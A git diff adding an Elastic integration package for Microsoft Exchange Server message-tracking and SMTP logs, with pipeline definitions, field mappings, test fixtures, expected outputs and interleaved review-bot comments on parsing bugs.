Agent=0.107)))|QDM=0.010|SMSC=0.006(X-SMSDR=0.011)|SMS=0.076(SMSMBXD=0.071),Originating,,,,S:E2ELatency=1.928;S:MsgRecipCount=1;S:IncludeInSla=True;S:Microsoft.Exchange.Transport.MailRecipient.RequiredTlsAuthLevel=Opportunistic;S:IsSmtpResponseFromExternalServer=False;S:DeliveryPriority=Normal;S:AccountForest=example.com,Email,a7ae9ef9-e10c-4111-19bf-08dc0f111bee,15.01.2507.035 diff --git a/packages/microsoft_exchange_server/data_stream/messagetracking/_dev/test/pipeline/test-messagetracking.log-expected.json b/packages/microsoft_exchange_server/data_stream/messagetracking/_dev/test/pipeline/test-messagetracking.log-expected.json new file mode 100644 index 00000000000..d4d03aa0694 --- /dev/null 
+++ b/packages/microsoft_exchange_server/data_stream/messagetracking/_dev/test/pipeline/test-messagetracking.log-expected.json 
@@ -0,0 +1,238 @@ +{ + "expected": [ + { + "@timestamp": "2024-01-25T15:16:09.843Z", + "email": { + "direction": "Incoming", + "from": { + "address": [ + "MAILER-DAEMON@host01.my.domain.com" + ] + }, + "local_id": "70971234566456", + "message_id": "<20240124222112.B4AE1234EF@host01.my.domain.com>", + "sender": { + "address": [ + "MAILER-DAEMON@host01.my.domain.com" + ] + }, + "subject": "Undelivered Mail Returned to Sender", + "to": { + "address": [ + "mailuser@my.domain.com" + ] + } + }, + "event": { + "ingested": "2024-03-19T09:29:56.855062517Z", + "original": "2024-01-25T15:16:09.843Z,,,,exchange-mail,No suitable shadow servers,,SMTP,HAREDIRECTFAIL,70971234566456,<20240124222112.B4AE1234EF@host01.my.domain.com>,2fd37dca-1234-5bfb-175d-08dc1db88f52,mailuser@my.domain.com,,15054,1,,,Undelivered Mail Returned to Sender,MAILER-DAEMON@host01.my.domain.com,root@host01.my.domain.com,,Incoming,,,,S:DeliveryPriority=Normal;S:OriginalFromAddress=root@host01.my.domain.com;S:AccountForest=my.domain.com,Email,dc69df25-1234-564c-41c4-08dc1db88f7f,15.02.0330.005" + }, + "message": "2024-01-25T15:16:09.843Z,,,,exchange-mail,No suitable shadow servers,,SMTP,HAREDIRECTFAIL,70971234566456,<20240124222112.B4AE1234EF@host01.my.domain.com>,2fd37dca-1234-5bfb-175d-08dc1db88f52,mailuser@my.domain.com,,15054,1,,,Undelivered Mail Returned to Sender,MAILER-DAEMON@host01.my.domain.com,root@host01.my.domain.com,,Incoming,,,,S:DeliveryPriority=Normal;S:OriginalFromAddress=root@host01.my.domain.com;S:AccountForest=my.domain.com,Email,dc69df25-1234-564c-41c4-08dc1db88f7f,15.02.0330.005", + "microsoft": { + "exchange": { + "customdata": "S:DeliveryPriority=Normal;S:OriginalFromAddress=root@host01.my.domain.com;S:AccountForest=my.domain.com", + "eventid": "HAREDIRECTFAIL", + "logid": "dc69df25-1234-564c-41c4-08dc1db88f7f", + "networkmessageid": "2fd37dca-1234-5bfb-175d-08dc1db88f52", + "recipientcount": 1, + "returnpath": "root@host01.my.domain.com", + "schemaversion": "15.02.0330.005", + 
"source": "SMTP", + "sourcecontext": "No suitable shadow servers", + "transporttraffictype": "Email" + } + }, + "network": { + "bytes": 15054 + }, + "server": { + "domain": "exchange-mail" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-01-25T15:16:09.949Z", + "client": { + "domain": "exchange-mail.my.domain.com", + "ip": "10.11.12.14" + }, + "email": { + "direction": "Incoming", + "from": { + "address": [ + "root@host01.my.domain.com" + ] + }, + "local_id": "70912345566403", + "message_id": "<20240123200014.123F425E28@host01.my.domain.com>", + "sender": { + "address": [ + "root@host01.my.domain.com" + ] + }, + "subject": "vzdump backup status (host01.my.domain.com): backup successful", + "to": { + "address": [ + "mailuser@my.domain.com" + ] + } + }, + "event": { + "ingested": "2024-03-19T09:29:56.855089772Z", + "original": "2024-01-25T15:16:09.949Z,10.11.12.14,exchange-mail.my.domain.com,10.11.12.14,exchange-mail,08DC1DB12C345BE5;2024-01-25T15:16:09.544Z;0,exchange-mail\\Default exchange-mail,SMTP,RECEIVE,70912345566403,<20240123200014.123F425E28@host01.my.domain.com>,1e6eb197-c6b4-1234-1b69-56dc1db88f50,mailuser@my.domain.com,,7229,1,,,vzdump backup status (host01.my.domain.com): backup successful,root@host01.my.domain.com,root@host01.my.domain.com,0cA: ,Incoming,,10.11.12.13,10.11.12.14,S:ProxyHop1=exchange-mail.my.domain.com(10.11.12.14);S:MessageValue=MediumHigh;S:Replication=Failed;S:FirstForestHop=exchange-mail.my.domain.com;S:FromEntity=Internet;S:ProxiedClientIPAddress=10.11.12.13;S:ProxiedClientHostname=host01.my.domain.com;S:DeliveryPriority=Normal;S:AccountForest=my.domain.com,Email,05503123-c5b9-46fe-1234-56dc1db88f8f,15.02.0330.005" + }, + "message": "2024-01-25T15:16:09.949Z,10.11.12.14,exchange-mail.my.domain.com,10.11.12.14,exchange-mail,08DC1DB12C345BE5;2024-01-25T15:16:09.544Z;0,exchange-mail\\Default 
exchange-mail,SMTP,RECEIVE,70912345566403,<20240123200014.123F425E28@host01.my.domain.com>,1e6eb197-c6b4-1234-1b69-56dc1db88f50,mailuser@my.domain.com,,7229,1,,,vzdump backup status (host01.my.domain.com): backup successful,root@host01.my.domain.com,root@host01.my.domain.com,0cA: ,Incoming,,10.11.12.13,10.11.12.14,S:ProxyHop1=exchange-mail.my.domain.com(10.11.12.14);S:MessageValue=MediumHigh;S:Replication=Failed;S:FirstForestHop=exchange-mail.my.domain.com;S:FromEntity=Internet;S:ProxiedClientIPAddress=10.11.12.13;S:ProxiedClientHostname=host01.my.domain.com;S:DeliveryPriority=Normal;S:AccountForest=my.domain.com,Email,05503123-c5b9-46fe-1234-56dc1db88f8f,15.02.0330.005", + "microsoft": { + "exchange": { + "connectorid": "exchange-mail\\Default exchange-mail", + "customdata": "S:ProxyHop1=exchange-mail.my.domain.com(10.11.12.14);S:MessageValue=MediumHigh;S:Replication=Failed;S:FirstForestHop=exchange-mail.my.domain.com;S:FromEntity=Internet;S:ProxiedClientIPAddress=10.11.12.13;S:ProxiedClientHostname=host01.my.domain.com;S:DeliveryPriority=Normal;S:AccountForest=my.domain.com", + "eventid": "RECEIVE", + "logid": "05503123-c5b9-46fe-1234-56dc1db88f8f", + "messageinfo": "0cA: ", + "networkmessageid": "1e6eb197-c6b4-1234-1b69-56dc1db88f50", + "originalclientip": "10.11.12.13", + "originalserverip": "10.11.12.14", + "recipientcount": 1, + "returnpath": "root@host01.my.domain.com", + "schemaversion": "15.02.0330.005", + "source": "SMTP", + "sourcecontext": "08DC1DB12C345BE5;2024-01-25T15:16:09.544Z;0", + "transporttraffictype": "Email" + } + }, + "network": { + "bytes": 7229 + }, + "server": { + "domain": "exchange-mail", + "ip": "10.11.12.14" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-01-25T15:16:14.415Z", + "client": { + "domain": "exchange-mail.my.domain.com", + "ip": "10.11.12.14" + }, + "email": { + "direction": "Incoming", + "from": { + "address": [ + "root@pve-vhost01.my.domain.com" + ] + }, + "local_id": "70912345566407", + 
"message_id": "<20240123200018.123C42553@pve-vhost01.my.domain.com>", + "sender": { + "address": [ + "root@pve-vhost01.my.domain.com" + ] + }, + "subject": "vzdump backup status (pve-vhost01.my.domain.com): backup successful", + "to": { + "address": [ + "mailuser@my.domain.com" + ] + } + }, + "event": { + "ingested": "2024-03-19T09:29:56.855094378Z", + "original": "2024-01-25T15:16:14.415Z,10.11.12.14,exchange-mail.my.domain.com,10.11.12.14,exchange-mail,08DC1DB12C345BE9;2024-01-25T15:16:12.885Z;0,exchange-mail\\Default exchange-mail,SMTP,RECEIVE,70912345566407,<20240123200018.123C42553@pve-vhost01.my.domain.com>,c95b5dd1-f520-1234-e6dc-56dc1db8914d,mailuser@my.domain.com,,8251,1,,,vzdump backup status (pve-vhost01.my.domain.com): backup successful,root@pve-vhost01.my.domain.com,root@pve-vhost01.my.domain.com,0cA: ,Incoming,,10.11.12.15,10.11.12.14,S:ProxyHop1=exchange-mail.my.domain.com(10.11.12.14);S:MessageValue=MediumHigh;S:Replication=Failed;S:FirstForestHop=exchange-mail.my.domain.com;S:FromEntity=Internet;S:ProxiedClientIPAddress=10.11.12.15;S:ProxiedClientHostname=pve-vhost01.my.domain.com;S:DeliveryPriority=Normal;S:AccountForest=my.domain.com,Email,d6aef52d-0e05-1234-e29b-56dc1db89238,15.02.0330.005" + }, + "message": "2024-01-25T15:16:14.415Z,10.11.12.14,exchange-mail.my.domain.com,10.11.12.14,exchange-mail,08DC1DB12C345BE9;2024-01-25T15:16:12.885Z;0,exchange-mail\\Default exchange-mail,SMTP,RECEIVE,70912345566407,<20240123200018.123C42553@pve-vhost01.my.domain.com>,c95b5dd1-f520-1234-e6dc-56dc1db8914d,mailuser@my.domain.com,,8251,1,,,vzdump backup status (pve-vhost01.my.domain.com): backup successful,root@pve-vhost01.my.domain.com,root@pve-vhost01.my.domain.com,0cA: 
,Incoming,,10.11.12.15,10.11.12.14,S:ProxyHop1=exchange-mail.my.domain.com(10.11.12.14);S:MessageValue=MediumHigh;S:Replication=Failed;S:FirstForestHop=exchange-mail.my.domain.com;S:FromEntity=Internet;S:ProxiedClientIPAddress=10.11.12.15;S:ProxiedClientHostname=pve-vhost01.my.domain.com;S:DeliveryPriority=Normal;S:AccountForest=my.domain.com,Email,d6aef52d-0e05-1234-e29b-56dc1db89238,15.02.0330.005", + "microsoft": { + "exchange": { + "connectorid": "exchange-mail\\Default exchange-mail", + "customdata": "S:ProxyHop1=exchange-mail.my.domain.com(10.11.12.14);S:MessageValue=MediumHigh;S:Replication=Failed;S:FirstForestHop=exchange-mail.my.domain.com;S:FromEntity=Internet;S:ProxiedClientIPAddress=10.11.12.15;S:ProxiedClientHostname=pve-vhost01.my.domain.com;S:DeliveryPriority=Normal;S:AccountForest=my.domain.com", + "eventid": "RECEIVE", + "logid": "d6aef52d-0e05-1234-e29b-56dc1db89238", + "messageinfo": "0cA: ", + "networkmessageid": "c95b5dd1-f520-1234-e6dc-56dc1db8914d", + "originalclientip": "10.11.12.15", + "originalserverip": "10.11.12.14", + "recipientcount": 1, + "returnpath": "root@pve-vhost01.my.domain.com", + "schemaversion": "15.02.0330.005", + "source": "SMTP", + "sourcecontext": "08DC1DB12C345BE9;2024-01-25T15:16:12.885Z;0", + "transporttraffictype": "Email" + } + }, + "network": { + "bytes": 8251 + }, + "server": { + "domain": "exchange-mail", + "ip": "10.11.12.14" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-01-07T00:00:07.463Z", + "client": { + "domain": "exchange", + "ip": "192.168.0.1" + }, + "email": { + "direction": "Originating", + "from": { + "address": [ + "support@example.com" + ] + }, + "local_id": "29519319995411", + "message_id": "20240107001234.567E6224C8@monitor.example.com", + "sender": { + "address": [ + "support@example.com" + ] + }, + "subject": "ein Titel", + "to": { + "address": [ + "uwe.musterman@example.com" + ] + } + }, + "event": { + "ingested": "2024-03-19T09:29:56.855121435Z", + "original": 
"2024-01-07T00:00:07.463Z,192.168.0.1,exchange,192.168.0.2,exchange.example.com,;250 2.0.0OK20240107001234.567E6224C8@monitor.example.com[Hostname=exchange.example.com];ClientSubmitTime:,Intra-Organization SMTP Send Connector,SMTP,SEND,29519319995411,20240107001234.567E6224C8@monitor.example.com,0b7099ea-cb95-1234-328e-08dc5f139ac8,uwe.musterman@example.com,250 2.1.5Recipient OK,38663,1,,,ein Titel,support@example.com,support@example.com,2024-01-07T00:00:05.535Z;LSRV=exchange.example.com:TOTAL-HUB=1.921|SMR=0.127(SMRDE=0.002|SMRC=0.125(SMRCL=0.105|X-SMRCR=0.125))|CAT=1.698(CATOS=0.018(CATSM=0.017(CATSM-Malware Agent=0.017))|CATRESL=0.004|CATORES=1.567(CATRS=1.566(CATRS-ScanMail Routing Agent=0.117|CATRS-Transport Rule Agent=0.002(X-ETREX=0.002)|CATRS-Index Routing Agent=1.444))|CATORT=0.108(CATRT=0.107(CATRT-Journal Agent=0.107)))|QDM=0.010|SMSC=0.006(X-SMSDR=0.011)|SMS=0.076(SMSMBXD=0.071),Originating,,,,S:E2ELatency=1.928;S:MsgRecipCount=1;S:IncludeInSla=True;S:Microsoft.Exchange.Transport.MailRecipient.RequiredTlsAuthLevel=Opportunistic;S:IsSmtpResponseFromExternalServer=False;S:DeliveryPriority=Normal;S:AccountForest=example.com,Email,a7ae9ef9-e10c-4111-19bf-08dc0f111bee,15.01.2507.035" + }, + "message": "2024-01-07T00:00:07.463Z,192.168.0.1,exchange,192.168.0.2,exchange.example.com,;250 2.0.0OK20240107001234.567E6224C8@monitor.example.com[Hostname=exchange.example.com];ClientSubmitTime:,Intra-Organization SMTP Send Connector,SMTP,SEND,29519319995411,20240107001234.567E6224C8@monitor.example.com,0b7099ea-cb95-1234-328e-08dc5f139ac8,uwe.musterman@example.com,250 2.1.5Recipient OK,38663,1,,,ein Titel,support@example.com,support@example.com,2024-01-07T00:00:05.535Z;LSRV=exchange.example.com:TOTAL-HUB=1.921|SMR=0.127(SMRDE=0.002|SMRC=0.125(SMRCL=0.105|X-SMRCR=0.125))|CAT=1.698(CATOS=0.018(CATSM=0.017(CATSM-Malware Agent=0.017))|CATRESL=0.004|CATORES=1.567(CATRS=1.566(CATRS-ScanMail Routing Agent=0.117|CATRS-Transport Rule Agent=0.002(X-ETREX=0.002)|CATRS-Index 
Routing Agent=1.444))|CATORT=0.108(CATRT=0.107(CATRT-Journal Agent=0.107)))|QDM=0.010|SMSC=0.006(X-SMSDR=0.011)|SMS=0.076(SMSMBXD=0.071),Originating,,,,S:E2ELatency=1.928;S:MsgRecipCount=1;S:IncludeInSla=True;S:Microsoft.Exchange.Transport.MailRecipient.RequiredTlsAuthLevel=Opportunistic;S:IsSmtpResponseFromExternalServer=False;S:DeliveryPriority=Normal;S:AccountForest=example.com,Email,a7ae9ef9-e10c-4111-19bf-08dc0f111bee,15.01.2507.035", + "microsoft": { + "exchange": { + "connectorid": "Intra-Organization SMTP Send Connector", + "customdata": "S:E2ELatency=1.928;S:MsgRecipCount=1;S:IncludeInSla=True;S:Microsoft.Exchange.Transport.MailRecipient.RequiredTlsAuthLevel=Opportunistic;S:IsSmtpResponseFromExternalServer=False;S:DeliveryPriority=Normal;S:AccountForest=example.com", + "eventid": "SEND", + "logid": "a7ae9ef9-e10c-4111-19bf-08dc0f111bee", + "messageinfo": "2024-01-07T00:00:05.535Z;LSRV=exchange.example.com:TOTAL-HUB=1.921|SMR=0.127(SMRDE=0.002|SMRC=0.125(SMRCL=0.105|X-SMRCR=0.125))|CAT=1.698(CATOS=0.018(CATSM=0.017(CATSM-Malware Agent=0.017))|CATRESL=0.004|CATORES=1.567(CATRS=1.566(CATRS-ScanMail Routing Agent=0.117|CATRS-Transport Rule Agent=0.002(X-ETREX=0.002)|CATRS-Index Routing Agent=1.444))|CATORT=0.108(CATRT=0.107(CATRT-Journal Agent=0.107)))|QDM=0.010|SMSC=0.006(X-SMSDR=0.011)|SMS=0.076(SMSMBXD=0.071)", + "networkmessageid": "0b7099ea-cb95-1234-328e-08dc5f139ac8", + "recipientcount": 1, + "recipientstatus": "250 2.1.5Recipient OK", + "returnpath": "support@example.com", + "schemaversion": "15.01.2507.035", + "source": "SMTP", + "sourcecontext": ";250 2.0.0OK20240107001234.567E6224C8@monitor.example.com[Hostname=exchange.example.com];ClientSubmitTime:", + "transporttraffictype": "Email" + } + }, + "network": { + "bytes": 38663 + }, + "server": { + "domain": "exchange.example.com", + "ip": "192.168.0.2" + }, + "tags": [ + "preserve_original_event" + ] + } + ] +} \ No newline at end of file 
diff --git a/packages/microsoft_exchange_server/data_stream/messagetracking/agent/stream/filestream.yml.hbs b/packages/microsoft_exchange_server/data_stream/messagetracking/agent/stream/filestream.yml.hbs
new file mode 100644
index 00000000000..9c5a9235ed8
--- /dev/null
+++ b/packages/microsoft_exchange_server/data_stream/messagetracking/agent/stream/filestream.yml.hbs
@@ -0,0 +1,17 @@
+paths:
+{{#each paths as |path i|}}
+ - {{path}}
+{{/each}}
+tags:
+{{#if preserve_original_event}}
+ - preserve_original_event
+{{/if}}
+{{#each tags as |tag i|}}
+ - {{tag}}
+{{/each}}
+exclude_files: [".gz$"]
+processors:
+ - add_locale: ~
+{{#if processors}}
+{{processors}}
+{{/if}}
diff --git a/packages/microsoft_exchange_server/data_stream/messagetracking/elasticsearch/ingest_pipeline/default.yml b/packages/microsoft_exchange_server/data_stream/messagetracking/elasticsearch/ingest_pipeline/default.yml
new file mode 100644
index 00000000000..72a02d020cd
--- /dev/null
+++ b/packages/microsoft_exchange_server/data_stream/messagetracking/elasticsearch/ingest_pipeline/default.yml
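Review bot: `exclude_files: [".gz$"]` leaves the `.` unescaped, so the pattern excludes any file whose name ends in any character followed by `gz`, not only a `.gz` extension; the intended expression is `exclude_files: ["\\.gz$"]`. The same template is repeated verbatim for the smtp stream later in this diff, so the fix applies to both copies. A one-line comment above `{{processors}}` noting that the user-supplied YAML is spliced in unescaped (which is the normal contract for a `yaml`-typed var, but not obvious from the template) would also help the next maintainer.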
@@ -0,0 +1,81 @@
+---
+description: Pipeline for processing Exchange Server Messagetracking logs
+processors:
+- drop:
+ if: "ctx.message =~ /^[^0-9]/ || ctx.message =~ /^#/"
+- set:
+ field: event.original
+ value: "{{{message}}}"
+- csv:
+ field: event.original
+ ignore_failure: true
+ ignore_missing: true
+ target_fields:
+ - "@timestamp"
+ - client.ip
+ - client.domain
+ - server.ip
+ - server.domain
+ - microsoft.exchange.sourcecontext
+ - microsoft.exchange.connectorid
+ - microsoft.exchange.source
+ - microsoft.exchange.eventid
+ - email.local_id
+ - email.message_id
+ - microsoft.exchange.networkmessageid
+ - email.to.address
+ - microsoft.exchange.recipientstatus
+ - network.bytes
+ - microsoft.exchange.recipientcount
+ - microsoft.exchange.relatedrecipientaddress
+ - microsoft.exchange.reference
+ - email.subject
+ - microsoft.exchange.senderaddress
+ - microsoft.exchange.returnpath
+ - microsoft.exchange.messageinfo
+ - email.direction
+ - microsoft.exchange.tenantid
+ - microsoft.exchange.originalclientip
+ - microsoft.exchange.originalserverip
+ - microsoft.exchange.customdata
+ - microsoft.exchange.transporttraffictype
+ - microsoft.exchange.logid
+ - microsoft.exchange.schemaversion
+ if: ctx.message =~ /^\d/
+- split:
+ field: email.to.address
+ separator: ";"
+ preserve_trailing: true
+ ignore_missing: true
+ ignore_failure: true
+- append:
+ field: email.sender.address
+ value: "{{{microsoft.exchange.senderaddress}}}"
+ ignore_failure: true
+- append:
+ field: email.from.address
+ value: "{{{microsoft.exchange.senderaddress}}}"
+ ignore_failure: true
+- remove:
+ field: microsoft.exchange.senderaddress
+- convert:
+ field: "microsoft.exchange.recipientcount"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "network.bytes"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- set:
+ field: event.ingested
+ value: "{{{_ingest.timestamp}}}"
+ ignore_failure: true
+on_failure:
+ - set:
+ field: event.kind
+ value: pipeline_error
+ - append:
+ field: error.message
+ value: '{{{ _ingest.on_failure_message }}}'
diff --git a/packages/microsoft_exchange_server/data_stream/messagetracking/fields/base-fields.yml b/packages/microsoft_exchange_server/data_stream/messagetracking/fields/base-fields.yml
new file mode 100644
index 00000000000..7c798f4534c
--- /dev/null
+++ b/packages/microsoft_exchange_server/data_stream/messagetracking/fields/base-fields.yml
@@ -0,0 +1,12 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: '@timestamp'
+ type: date
+ description: Event timestamp.
diff --git a/packages/microsoft_exchange_server/data_stream/messagetracking/fields/ecs.yml b/packages/microsoft_exchange_server/data_stream/messagetracking/fields/ecs.yml
new file mode 100644
index 00000000000..274f45cc7ba
--- /dev/null
+++ b/packages/microsoft_exchange_server/data_stream/messagetracking/fields/ecs.yml
@@ -0,0 +1,28 @@
+- external: ecs
+ name: message
+- external: ecs
+ name: client.ip
+- external: ecs
+ name: client.domain
+- external: ecs
+ name: server.ip
+- external: ecs
+ name: server.domain
+- external: ecs
+ name: email.to.address
+- external: ecs
+ name: email.sender.address
+- external: ecs
+ name: email.from.address
+- external: ecs
+ name: email.subject
+- external: ecs
+ name: email.direction
+- external: ecs
+ name: email.message_id
+- external: ecs
+ name: email.local_id
+- external: ecs
+ name: network.bytes
+- external: ecs
+ name: tags
diff --git a/packages/microsoft_exchange_server/data_stream/messagetracking/fields/fields.yml b/packages/microsoft_exchange_server/data_stream/messagetracking/fields/fields.yml
new file mode 100644
index 00000000000..3375724ba18
--- /dev/null
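Review bot: The two `append` processors render `{{{microsoft.exchange.senderaddress}}}` with no condition, so on any record where the preceding `csv` step left that field unset (it runs with `ignore_failure: true`, and a short row would presumably leave the trailing targets empty) the template evaluates to an empty string which, as far as I can tell, is then appended to `email.sender.address` and `email.from.address`; the following `remove` then fails because the field is absent and the event is marked `pipeline_error` for the wrong reason. Guard both appends with `if: ctx.microsoft?.exchange?.senderaddress != null` and give the `remove` `ignore_missing: true`. Separately, `ignore_failure: true` on the `csv` processor means a line the parser rejects (an unbalanced quote, for instance) is indexed with only `message`/`event.original` and no `event.kind`/`error.message`, so it is invisible to any rule or dashboard keyed on `email.*` or `microsoft.exchange.eventid`; for a mail-security log it is safer to let that failure reach the pipeline's `on_failure`, either by dropping `ignore_failure` or by adding a per-processor `on_failure` that tags the event. Minor: the smtp pipeline sets `event.original` with `copy_from: message`, which is the cleaner equivalent of `value: "{{{message}}}"` used here.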
+++ b/packages/microsoft_exchange_server/data_stream/messagetracking/fields/fields.yml
@@ -0,0 +1,38 @@
+- name: microsoft.exchange.sourcecontext
+ type: keyword
+- name: microsoft.exchange.connectorid
+ type: keyword
+- name: microsoft.exchange.source
+ type: keyword
+- name: microsoft.exchange.eventid
+ type: keyword
+- name: microsoft.exchange.networkmessageid
+ type: keyword
+- name: microsoft.exchange.recipientstatus
+ type: keyword
+- name: microsoft.exchange.recipientcount
+ type: long
+- name: microsoft.exchange.relatedrecipientaddress
+ type: ip
+- name: microsoft.exchange.reference
+ type: keyword
+- name: microsoft.exchange.returnpath
+ type: keyword
+- name: microsoft.exchange.messageinfo
+ type: keyword
+- name: microsoft.exchange.tenantid
+ type: keyword
+- name: microsoft.exchange.originalclientip
+ type: ip
+- name: microsoft.exchange.originalserverip
+ type: ip
+- name: microsoft.exchange.customdata
+ type: keyword
+- name: microsoft.exchange.transporttraffictype
+ type: keyword
+- name: microsoft.exchange.logid
+ type: keyword
+- name: microsoft.exchange.schemaversion
+ type: keyword
+- name: microsoft.exchange.logtype
+ type: keyword
diff --git a/packages/microsoft_exchange_server/data_stream/messagetracking/manifest.yml b/packages/microsoft_exchange_server/data_stream/messagetracking/manifest.yml
new file mode 100644
index 00000000000..d113a8c1a90
--- /dev/null
+++ b/packages/microsoft_exchange_server/data_stream/messagetracking/manifest.yml
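Review bot: `microsoft.exchange.relatedrecipientaddress` is mapped as `type: ip`, but in the Exchange message tracking schema the `related-recipient-address` column carries other recipient e-mail addresses (it is populated for EXPAND, REDIRECT and RESOLVE events), so the first such record will hit a mapper parse error on that field and, unless `ignore_malformed` is enabled on the index, the whole document is rejected rather than just the field — and the pipeline's `csv` step assigns it unconditionally. It should be `type: keyword`. `microsoft.exchange.logtype` is also declared here although nothing in the messagetracking pipeline writes it (only the smtp pipeline does); either drop it from this file or set it in the pipeline so the two streams stay consistent.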
@@ -0,0 +1,29 @@
+title: "Exchange Messagetracking"
+type: logs
+streams:
+ - input: filestream
+ title: Exchange Messagetracking Logs
+ description: Collect Exchange Messagetracking logs
+ vars:
+ - name: paths
+ type: text
+ title: Paths
+ required: true
+ multi: true
+ show_user: true
+ default:
+ - "C:\\Program Files\\Microsoft\\Exchange Server\\V15\\TransportRoles\\Logs\\MessageTracking\\*.LOG"
+ - name: tags
+ type: text
+ title: Tags
+ multi: true
+ required: false
+ show_user: false
+ - name: processors
+ type: yaml
+ title: Processors
+ multi: false
+ required: false
+ show_user: false
+ description: >-
+ Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/fleet/current/elastic-agent-processor-configuration.html) for details.
diff --git a/packages/microsoft_exchange_server/data_stream/smtp/_dev/test/pipeline/test-common-config.yml b/packages/microsoft_exchange_server/data_stream/smtp/_dev/test/pipeline/test-common-config.yml
new file mode 100644
index 00000000000..a06dda74051
--- /dev/null
+++ b/packages/microsoft_exchange_server/data_stream/smtp/_dev/test/pipeline/test-common-config.yml
@@ -0,0 +1,5 @@
+dynamic_fields:
+ "event.ingested": ".*"
+fields:
+ tags:
+ - preserve_original_event
diff --git a/packages/microsoft_exchange_server/data_stream/smtp/_dev/test/pipeline/test-smtp.json b/packages/microsoft_exchange_server/data_stream/smtp/_dev/test/pipeline/test-smtp.json
new file mode 100644
index 00000000000..1ed50a5fcbc
--- /dev/null
+++ b/packages/microsoft_exchange_server/data_stream/smtp/_dev/test/pipeline/test-smtp.json
@@ -0,0 +1,60 @@
+{
+ "events": [
+ {
+ "log": {
+ "file": {
+ "path": "SmtpSend"
+ }
+ },
+ "message": "2024-01-25T15:14:39.460Z,Inbound Proxy Internal Send Connector,08DC1DB8591B22A0,0,,10.11.12.13:2525,*,None,Set Session Permissions"
+ },
+ {
+ "log": {
+ "file": {
+ "path": "SmtpSend"
+ }
+ },
+ "message": "2024-01-25T15:14:39.460Z,Inbound Proxy Internal Send Connector,08DC1DB8591B22A0,1,,10.11.12.13:2525,*,,attempting to connect"
+ },
+ {
+ "log": {
+ "file": {
+ "path": "SmtpSend"
+ }
+ },
+ "message": "2024-01-25T15:14:40.508Z,Inbound Proxy Internal Send Connector,08DC1DB8591B229F,2,,10.11.12.13:2525,*,,\"Failed to connect. Winsock error code: 10061, Win32 error code: 10061, Destination domain: internalproxy, Error Message: No connection could be made because the target machine actively refused it 10.11.12.13:2525.\""
+ },
+ {
+ "log": {
+ "file": {
+ "path": "SmtpRecive"
+ }
+ },
+ "message": "2024-01-25T15:14:39.026Z,NETBIOS\\Default Frontend NETBIOS,08DC1DB8591B229A,1,10.11.12.13:25,10.11.12.14:53228,>,\"220 my-mail.my.domain.tld Microsoft ESMTP MAIL Service ready at Thu, 25 Jan 2024 16:14:38 +0100\","
+ },
+ {
+ "log": {
+ "file": {
+ "path": "SmtpRecive"
+ }
+ },
+ "message": "2024-01-25T15:14:39.026Z,NETBIOS\\Default Frontend NETBIOS,08DC1DB8591B229B,0,10.11.12.13:25,10.11.12.14:53230,+,,"
+ },
+ {
+ "log": {
+ "file": {
+ "path": "SmtpRecive"
+ }
+ },
+ "message": "2024-01-25T15:14:39.031Z,NETBIOS\\Default Frontend NETBIOS,08DC1DB8591B229A,2,10.11.12.13:25,10.11.12.14:53228,<,EHLO mgt.my.domain.tld,"
+ },
+ {
+ "log": {
+ "file": {
+ "path": "SmtpRecive"
+ }
+ },
+ "message": "2024-01-25T15:14:39.066Z,NETBIOS\\Default Frontend NETBIOS,08DC1DB8591B229B,1,10.11.12.13:25,10.11.12.14:53230,>,\"220 my-mail.my.domain.tld Microsoft ESMTP MAIL Service ready at Thu, 25 Jan 2024 16:14:38 +0100\","
+ }
+ ]
+}
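Review bot: The `log.file.path` on the four receive-side events is `SmtpRecive`, which does not match the `/SmtpReceive/` condition in the smtp pipeline, so `microsoft.exchange.logtype` is never set for them — the expected output in this same diff confirms it (no `logtype` on those events) — and the `smtpreceive` branch of the pipeline is therefore not exercised by this test at all. Change the fixture value to `"path": "SmtpReceive"` (ideally a realistic full path, since the condition is a substring match on the whole path) and regenerate the expected file so a regression in that condition would be caught.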
diff --git a/packages/microsoft_exchange_server/data_stream/smtp/_dev/test/pipeline/test-smtp.json-expected.json b/packages/microsoft_exchange_server/data_stream/smtp/_dev/test/pipeline/test-smtp.json-expected.json new file mode 100644 index 00000000000..49bca327506 --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/smtp/_dev/test/pipeline/test-smtp.json-expected.json 
@@ -0,0 +1,193 @@ +{ + "expected": [ + { + "@timestamp": "2024-01-25T15:14:39.460Z", + "event": { + "ingested": "2024-03-06T15:08:18.600372171Z", + "original": "2024-01-25T15:14:39.460Z,Inbound Proxy Internal Send Connector,08DC1DB8591B22A0,0,,10.11.12.13:2525,*,None,Set Session Permissions" + }, + "log": { + "file": { + "path": "SmtpSend" + } + }, + "message": "2024-01-25T15:14:39.460Z,Inbound Proxy Internal Send Connector,08DC1DB8591B22A0,0,,10.11.12.13:2525,*,None,Set Session Permissions", + "microsoft": { + "exchange": { + "connectorid": "Inbound Proxy Internal Send Connector", + "context": "Set Session Permissions", + "data": "None", + "event": "*", + "logtype": "smtpsend", + "remoteendpoint": "10.11.12.13:2525", + "sequencenumber": 0, + "sessionid": "08DC1DB8591B22A0" + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-01-25T15:14:39.460Z", + "event": { + "ingested": "2024-03-06T15:08:18.600384925Z", + "original": "2024-01-25T15:14:39.460Z,Inbound Proxy Internal Send Connector,08DC1DB8591B22A0,1,,10.11.12.13:2525,*,,attempting to connect" + }, + "log": { + "file": { + "path": "SmtpSend" + } + }, + "message": "2024-01-25T15:14:39.460Z,Inbound Proxy Internal Send Connector,08DC1DB8591B22A0,1,,10.11.12.13:2525,*,,attempting to connect", + "microsoft": { + "exchange": { + "connectorid": "Inbound Proxy Internal Send Connector", + "context": "attempting to connect", + "event": "*", + "logtype": "smtpsend", + "remoteendpoint": "10.11.12.13:2525", + "sequencenumber": 1, + "sessionid": "08DC1DB8591B22A0" + } + }, + 